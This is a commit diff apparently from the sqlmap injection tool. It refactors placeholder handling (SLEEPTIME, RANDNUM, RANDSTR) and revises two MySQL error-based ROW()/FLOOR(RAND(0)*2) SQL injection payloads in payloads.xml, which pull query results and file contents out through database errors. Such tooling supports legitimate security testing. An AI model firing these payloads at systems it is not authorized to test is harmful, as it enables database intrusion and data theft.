fixing an issue with --file-read and ROW() MySQL payload (it's internal caching mechanism prevents error message if FROM part is not unique enough dumping only partial file content); minor refactoring

lib/controller/checks.py

@@ -488,9 +488,6 @@ def checkSqlInjection(place, parameter, value):
                         if vector is None and "vector" in test and test.vector is not None:
                             vector = "%s%s" % (test.vector, comment or "")
 
-                        if method == PAYLOAD.METHOD.TIME:
-                            reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload)
-
                         injection.data[stype] = AttribDict()
                         injection.data[stype].title = title
                         injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)

lib/controller/controller.py

@@ -138,7 +138,7 @@ def __formatInjection(inj):
                 title = title.replace("columns", "column")
         data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
         data += "    Title: %s\n" % title
-        data += "    Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec)))
+        data += "    Payload: %s\n" % agent.adjustLateValues(sdata.payload)
         data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 
     return data

lib/core/agent.py

@@ -212,20 +212,19 @@ class Agent:
         if payload is None:
             return
 
-        randInt = randomInt()
-        randInt1 = randomInt()
-        randInt2 = randomInt()
-        randStr = randomStr()
-        randStr1 = randomStr()
-
         _ = (
-                ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\
-                ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
+                ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
                 ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
                 ("[HASH_REPLACE]", kb.chars.hash_)
             )
         payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
 
+        for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
+            payload = payload.replace(_, str(randomInt()))
+
+        for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
+            payload = payload.replace(_, randomStr())
+
         if origValue is not None:
             payload = payload.replace("[ORIGVALUE]", origValue)
 
@@ -249,12 +248,15 @@ class Agent:
 
         return payload
 
-    def adjustSleepTime(self, payload):
+    def adjustLateValues(self, payload):
         """
-        Returns payload with a replaced tag for SLEEPTIME
+        Returns payload with a replaced late tags (e.g. SLEEPTIME)
         """
 
-        return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload
+        if payload:
+            payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
+
+        return payload
 
     def getComment(self, request):
         """

lib/request/connect.py

@@ -540,7 +540,7 @@ class Connect:
 
         raise404 = place != PLACE.URI if raise404 is None else raise404
 
-        value = agent.adjustSleepTime(value)
+        value = agent.adjustLateValues(value)
         payload = agent.extractPayload(value)
         threadData = getCurrentThreadData()
 

lib/request/direct.py

@@ -28,7 +28,7 @@ from lib.utils.timeout import timeout
 def direct(query, content=True):
     select = True
     query = agent.payloadDirect(query)
-    query = agent.adjustSleepTime(query)
+    query = agent.adjustLateValues(query)
     threadData = getCurrentThreadData()
 
     if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:

xml/payloads.xml

@@ -1215,9 +1215,9 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
-        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
+        <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
         <request>
-            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
+            <payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1433,9 +1433,9 @@ Formats:
         <risk>2</risk>
         <clause>1</clause>
         <where>2</where>
-        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
+        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
         <request>
-            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
+            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>